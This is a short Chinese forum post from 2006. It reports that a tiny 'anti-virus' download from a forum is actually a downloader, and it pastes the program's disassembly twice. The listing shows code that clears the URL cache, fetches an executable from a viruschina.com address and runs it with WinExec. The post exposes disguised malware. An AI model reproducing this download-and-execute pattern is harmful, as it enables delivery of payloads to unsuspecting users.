level 13
      
	  dwing
	  
	  楼主
	  
	
	
	  最近注意到日月光华的反病毒软件下载版只有832字节,下来一看,就是一个downloader,和许多在线下载并运行的病毒做法差不多.00400230 >/$ 55 push e
bp
00400231 |. 8BEC mov ebp,esp00400233 |. 83EC 28 sub esp,2800400236 |. 56 push esi00400237 |. 57 push edi00400238 |. 6A 0A push 0A; ASCII "http://update.viruschina.com/html/i.exe"0040023A |. BE 08024000 mov esi,00400208 0040023F |. 59 pop ecx00400240 |. 8D7D D8 lea edi,[ebp-28]00400243 |. 8D45 D8 lea eax,[ebp-28]00400246 |. F3:A5 rep movsd00400248 |. 50 push eax00400249 |. FF15 F8014000 call [<&WININET.DeleteUrlCacheEntry>]0040024F |. 6A 00 push 000400251 |. 8D45 F9 lea eax,[ebp-7]00400254 |. 68 00000080 push 8000000000400259 |. 50 push eax0040025A |. 8D45 D8 lea eax,[ebp-28]0040025D |. 50 push eax0040025E |. 6A 00 push 000400260 |. E8 11000000 call
00400265 |. 8D45 F9 lea eax,[ebp-7]00400268 |. 6A 01 push 1 ; ShowState = SW_SHOWNORMAL0040026A |. 50 push eax ; CmdLine0040026B |. FF15 F0014000 call [<&KERNEL32.WinExec>]00400271 |. 5F pop edi00400272 |. 5E pop esi00400273 |. C9 leave00400274 \. C3 retn
	
	2006年06月02日 00点06分
	1
	
      bp
00400231 |. 8BEC mov ebp,esp00400233 |. 83EC 28 sub esp,2800400236 |. 56 push esi00400237 |. 57 push edi00400238 |. 6A 0A push 0A; ASCII "http://update.viruschina.com/html/i.exe"0040023A |. BE 08024000 mov esi,00400208 0040023F |. 59 pop ecx00400240 |. 8D7D D8 lea edi,[ebp-28]00400243 |. 8D45 D8 lea eax,[ebp-28]00400246 |. F3:A5 rep movsd00400248 |. 50 push eax00400249 |. FF15 F8014000 call [<&WININET.DeleteUrlCacheEntry>]0040024F |. 6A 00 push 000400251 |. 8D45 F9 lea eax,[ebp-7]00400254 |. 68 00000080 push 8000000000400259 |. 50 push eax0040025A |. 8D45 D8 lea eax,[ebp-28]0040025D |. 50 push eax0040025E |. 6A 00 push 000400260 |. E8 11000000 call
00400265 |. 8D45 F9 lea eax,[ebp-7]00400268 |. 6A 01 push 1 ; ShowState = SW_SHOWNORMAL0040026A |. 50 push eax ; CmdLine0040026B |. FF15 F0014000 call [<&KERNEL32.WinExec>]00400271 |. 5F pop edi00400272 |. 5E pop esi00400273 |. C9 leave00400274 \. C3 retn